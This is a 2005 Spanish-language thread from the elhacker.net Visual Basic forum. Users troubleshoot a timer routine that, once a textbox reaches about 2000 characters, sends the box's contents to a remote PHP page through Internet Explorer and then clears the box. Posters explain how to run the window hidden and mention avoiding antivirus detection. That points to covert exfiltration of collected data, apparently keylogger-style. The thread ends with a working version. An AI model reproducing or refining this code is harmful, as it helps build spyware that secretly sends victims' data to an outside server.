elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Inestabilidad en Script
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Inestabilidad en Script  (Leído 2,275 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Inestabilidad en Script
« en: 19 Septiembre 2005, 07:22 am »

hola... de nuevo con mis problemas...
Ahora es el siguiente!.

quiero hacer que kuando text1 tenga mas de 2000 letras abra un internet explorer y mande la informacion a una pagina.
pero no se pke no funciona... si borra el contenido de text1, pero no se abre el programa, un compañero me dijo que era pke el script era inestable... es cierto esto?

Aki les dejo el codigo

Código:
Private Sub Timer2_Timer()
If Len(Text1) >= 2000 Then
Call ShellExecute(hwnd, "Open", ("iexplore.exe"), "http://www.misitio.com/update.php?datos=" & Text1, vbNullString, 0)
Text1 = ""
End If
End Sub

NOTA: La inestabilidad se presenta a partir del valor 999, a partir de ese valor a veces se ejecuta a veces no...
eso si, en el 2500 no se ejecuta! xD
en el 1500 es donde a veces si, a veces no.


Esto se solucionaria si uso otra kosa que no sea "ShellExecute"??????
o seguiria siendo inestable?...

Algun consejillo porfavor


« Última modificación: 19 Septiembre 2005, 07:25 am por Ado's_Xtreme » En línea

Hackeo, luego existo...
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #1 en: 19 Septiembre 2005, 10:06 am »

Prueba así:

Código:
Private Sub Timer2_Timer()
If Len(Text1.Text) >= 2000 Then
Call ShellExecute(hwnd, "Open", ("iexplore.exe"), "http://www.misitio.com/update.php?datos=" & Text1.Text, vbNullString, 0)
Text1.Text = ""
End If
End Sub

Tiner2.Interval = 200


En línea

Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #2 en: 19 Septiembre 2005, 14:39 pm »

??

Cuando en un code te referis a "Text1" no lo interpreta directamente como "Text1.Text"? tenia entendido que era lo mismo...

Creo que eso da igual. yo te diria que pruebes asi:

ShellExecute Form1.hwnd, "open", "http://www.misitio.com/update.php?datos=", vbNullString, vbNullString, 0

Tambien estaba pensando que quizas te convendria unir todo el text1.text + el url en una variable y abrir directamente con ShellExecute la variable string.

Saludos
En línea

:: I was born ready motha fucka ::
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #3 en: 19 Septiembre 2005, 16:21 pm »

Mhhh... sigue igual, intente como dijiste yeikos y nada...
Si, el problema esta cuando le digo que ademas de la url meta a text1.text.......
Tambien intente asi:

Código:
Private Sub Timer2_Timer()
Dim hola As String
hola = "www.google.com" & Text1.Text
If Len(Text1) >= 2000 Then
Call ShellExecute(hwnd, "Open", ("iexplore.exe"), "http://www.misitio.com/update.php?datos=" & Text1.Text, vbNullString, 0)Text1 = ""
End If
End Sub
y nada...... Jejejeje

existe otra forma de abrir archivos?
con el Shell si me funciona... pero me han dicho que es detectado por antivirus.
Mhhh.... como podria hacerle?

me akabo de dar cuenta que si text1.text tiene mas de 1900 caracteres escritos no se manda......
no se que suceda.
Se puede hacer que text1.text tenga limite de escritura???????????????????
precisamente de 1900 caracteres????
« Última modificación: 19 Septiembre 2005, 16:49 pm por Ado's_Xtreme » En línea

Hackeo, luego existo...
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Inestabilidad en Script
« Respuesta #4 en: 19 Septiembre 2005, 18:17 pm »

si, para el limite de 1900 caracteres:

Código:
text1.maxlegth = 1900

Yo te recomendaria usar la api:

Código:
Private Declare Function ShellExecuteA Lib "SHELL32.DLL" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long


y para ejecutar :

Código:
ShellExecuteA Me.hWnd, "Open", "http://www.dex.com", vbNullString, vbNullString, 1

PD:Si algien sabe como acer que se ejecute oculto me podria poner el codigo please... Gracias

Salu2 ejoy it!!!

En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #5 en: 19 Septiembre 2005, 18:42 pm »

yo se como hacer que se ejecute ocultoOo...
pero el problema es que si text1 tiene mas de 1800 caracteres el comando no funciona!!!!!!

para que se ejecute oculto cambia el 1 por un 0
jajajaja y ya!
En línea

Hackeo, luego existo...
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Inestabilidad en Script
« Respuesta #6 en: 19 Septiembre 2005, 19:07 pm »

Gracias  ;)
En línea

Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #7 en: 19 Septiembre 2005, 23:24 pm »

yo se como hacer que se ejecute ocultoOo...
pero el problema es que si text1 tiene mas de 1800 caracteres el comando no funciona!!!!!!

para que se ejecute oculto cambia el 1 por un 0
jajajaja y ya!


Probaste como te dije o lo ignoraste completamente? me refiero, a usar una variable en vez de un textbox

Saludos
En línea

:: I was born ready motha fucka ::
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Inestabilidad en Script
« Respuesta #8 en: 20 Septiembre 2005, 02:05 am »

Oh....... lo siento, eske no entendi lo que me habias dichoOo!
>.<

 :-[
Pero ya solucione el problema es que si el textbox tiene mas de 1900 caracteres no puede mandarlos...
Lo que hice fue ponerle un limite al textbox de 1800 y cuando se llene los manda...
Ya funciona correctamente  ;D GRACIAS!!!!!!!
En línea

Hackeo, luego existo...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
inestabilidad wifi.
Redes
jemez44 5 3,039 Último mensaje 30 Agosto 2013, 13:32 pm
por marketingcw
Inestabilidad en el mercado de la DRAM, los precios seguirán subiendo
Noticias
wolfbcn 0 1,199 Último mensaje 29 Enero 2017, 02:28 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines